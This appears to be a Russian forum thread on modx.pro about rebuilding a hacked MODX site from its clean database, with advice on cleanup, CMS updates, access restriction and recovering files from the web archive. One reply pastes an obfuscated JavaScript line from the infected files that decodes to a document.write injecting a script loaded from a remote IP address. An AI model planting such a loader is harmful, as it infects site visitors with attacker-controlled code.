[Закрыт] Взломан сайт, чистой осталась только БД, можно ли восстановить?

Привет!

Один из сайтов оказался заражен, на хостинге куча мусора, половина файлов убита или потеряна. Чистой осталась БД. Можно ли как-то восстановить сайт только с БД?

UPD: понял, что можно. пара вопросов:
1. как узнать какая версия MODX стояла? (нашел)
2. как узнать какие плагины стояли?
3. правильно я понимаю процедуру: установил MODX,  установил плагины, которые стояли, залил БД?
(опытным путем выяснил что так правильно)

UPD2: все восстановил
anton
anton
04 октября 2018, 18:21
modx.pro
986
0

Комментарии: 7

Михаил
Михаил
04 октября 2018, 18:50
0
Напишите в телеграм electricaev паодскажу
    Сергей Шлоков
    Сергей Шлоков
    05 октября 2018, 08:21
    0
    Я бы добавил ещё один вопрос
    4. Как узнать как делать бэкапы?
      anton
      anton
      05 октября 2018, 12:36
      0
      пришли потешить свое чсв? сайт делался на заказ много лет назад, заражен оказался тоже давно, ко мне клиент обратился вчера.
      Roman
      Roman
      05 октября 2018, 11:48
      0
      1) Лечи Aibolit'ом
      2) Обнови CMS до последней версии
      3) закрой доступы по IP
      Вот мануал: modx.pro/security/16034
        anton
        anton
        05 октября 2018, 12:40
        0
        1. мануал читал, вылечить не получится, все js побиты, то есть там нет реального кода, а все какие-то 
        var _0x2515=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0x2515[5]](_0x2515[4][_0x2515[3]](_0x2515[0])[_0x2515[2]]()[_0x2515[1]](_0x2515[0]));
        2. восстановлюсь и буду обновлять

        3. возможно ли сделать Базовая авторизация в служебные директории на хостинге nic.ru? для этого придется переводить ВЕСЬ хостинг на ручное управление nginx?
          Илья
          Илья
          05 октября 2018, 15:50
          0
          по 1 пункту — учитывая что сайт старый можно попробовать по-файлово дёрнуть js-ки из веб-архива.
          Сам когда с таким столкнулся это помогло спасти кастомные js-ки, от остального мусора помогло ПОЛНОЕ удаление пакета и повторное выкачивание из репозитория, т.к. вирусня побила и файлы пакетов(разархивированные по крайней мере) и деинсталяция-установка результатов не дали — перезаписалась та же вирусня.

          по 3 пункту- попробуй связаться с ТП, думаю (сам nic-ом давно не пользуюсь, слишком цены кусучие) они подскажут как правильнее закрыть.
            anton
            anton
            05 октября 2018, 18:17
            0
            спасибо
            1. все файлы нашел и вернул на место как раз через вебархив. с этим вопроса не было
            3. а чем пользуетесь? я начал пользоваться ником очень давно и если честно толи плохо искал, толи что, но мне кажется, что 600 рублей в месяц у них это самое дешевое для моих 10+ сайтов. подскажите у кого вы?
        Авторизуйтесь или зарегистрируйтесь, чтобы оставлять комментарии.
        7